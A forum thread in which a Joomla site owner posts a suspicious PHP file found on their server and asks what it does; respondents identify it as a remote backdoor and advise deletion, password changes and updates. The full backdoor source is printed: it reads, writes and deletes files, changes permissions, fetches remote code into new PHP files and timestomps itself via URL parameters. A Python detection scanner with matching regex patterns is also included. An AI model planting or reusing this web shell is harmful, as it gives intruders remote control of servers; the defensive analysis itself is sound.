strange file suddenly appeared

Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site where I noticed today that a strange file was added at my site root 4 days ago, and I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP that I'm not entirely sure what it's all supposed to be doing or what its origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php, but WordPress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>


Any ideas?

Thanks
billium99Asked:
Ray Paseur commented:
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
Marco Gasi (Freelancer) commented:
I only took a look, but if I were you I would immediately back up those files on my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions and deletes files, and these are things only you should do: if you're not sure about it, don't trust it.

I don't know Joomla, but I doubt any framework can create such files: I repeat, copy them to an unoffensive location and delete them from the server, then talk with the host provider.
0
 
billium99Author Commented:
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
 
Dave Baldwin (Fixer of Problems) commented:
Yes, get rid of that file.
0
 
Marco Gasi (Freelancer) commented:
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. unlink is the PHP command to delete files.
0
 
Dave Baldwin (Fixer of Problems) commented:
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
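As an added defender-side example (not code from the thread or from Joomla), the triage script below looks for the traits Dave describes in the posted wp-sto.php: file-system calls fed directly from $_GET, the file dumping its own source, a curl fetch, and the three-argument touch() that copies index.php's timestamps so the file blends in. It is Python rather than PHP so it can be run from a workstation against an offline copy of the webroot; the function names and the sample files it builds are constructed for the demonstration and are hypothetical.

```python
import os
import re
import tempfile
# Traits of the posted wp-sto.php: request parameters fed straight into file
# calls, dumping its own source, curl fetches, and copying timestamps (atouch).
INDICATORS = {
    "get_to_fs": re.compile(r"\b(unlink|chmod|mkdir|rmdir|file_put_contents|fopen)\s*\(\s*\$_(GET|POST|REQUEST)"),
    "self_dump": re.compile(r"file_get_contents\s*\(\s*__FILE__\s*\)"),
    "remote_fetch": re.compile(r"curl_init\s*\("),
    "touch_clone": re.compile(r"touch\s*\(\s*\$\w+\s*,\s*\$\w+\s*,\s*\$\w+"),
}

def score_source(src):
    """Map each indicator name to whether it fires on one PHP source text."""
    return {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}

def scan_webroot(root, reference="index.php"):
    """Flag .php files with 2+ indicators or an mtime identical to the reference file."""
    ref_path = os.path.join(root, reference)
    ref_mtime = int(os.stat(ref_path).st_mtime) if os.path.exists(ref_path) else None
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if not fn.lower().endswith(".php") or path == ref_path:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = [k for k, v in score_source(fh.read()).items() if v]
            same_mtime = ref_mtime is not None and int(os.stat(path).st_mtime) == ref_mtime
            if len(hits) >= 2 or same_mtime:
                findings.append({"path": os.path.relpath(path, root),
                                 "indicators": hits, "mtime_matches_index": same_mtime})
    return findings

def build_demo_root():
    """Constructed webroot (hypothetical): benign index.php and helper, plus a few
    lines taken from the posted file, timestomped so its mtime equals index.php's."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "index.php": "<?php\ndefine('_JEXEC', 1);\nrequire 'includes/framework.php';\n",
        "helper.php": "<?php\nfunction clean($s) { return htmlspecialchars($s); }\n",
        "wp-sto.php": ("<?\nignore_user_abort(1);\nif (isset($_GET['sc'])) die(file_get_contents(__FILE__));\n"
                       "if (isset($_GET['del'])) { unlink($_GET['del']); die(); }\n$c = curl_init();\n@touch($dist,$MTime,$MTime);\n"),
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    for name in ("index.php", "wp-sto.php"):  # constructed past timestamp on both files
        os.utime(os.path.join(root, name), (1_300_000_000, 1_300_000_000))
    return root
```

Run scan_webroot() against a copy of the real site root and review every hit by hand; the mtime check catches files the regexes miss, since the posted atouch() function deliberately clones index.php's modification time onto the dropped file.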
 
Dave Baldwin (Fixer of Problems) commented:
And yes, someone broke into your server.  You should change passwords for all access.
0
 
Marco Gasi (Freelancer) commented:
Yes, indeed. I was reading the code: really, I don't understand exactly what it does or in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file, passing it some parameters, and do something bad like delete your files, even empty whole directories...

Change all passwords and provide security to your dedicated server, because it has been violated. I'm sorry.
0
 
gr8gonzo (Consultant) commented:
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
 
billium99Author Commented:
Thanks
0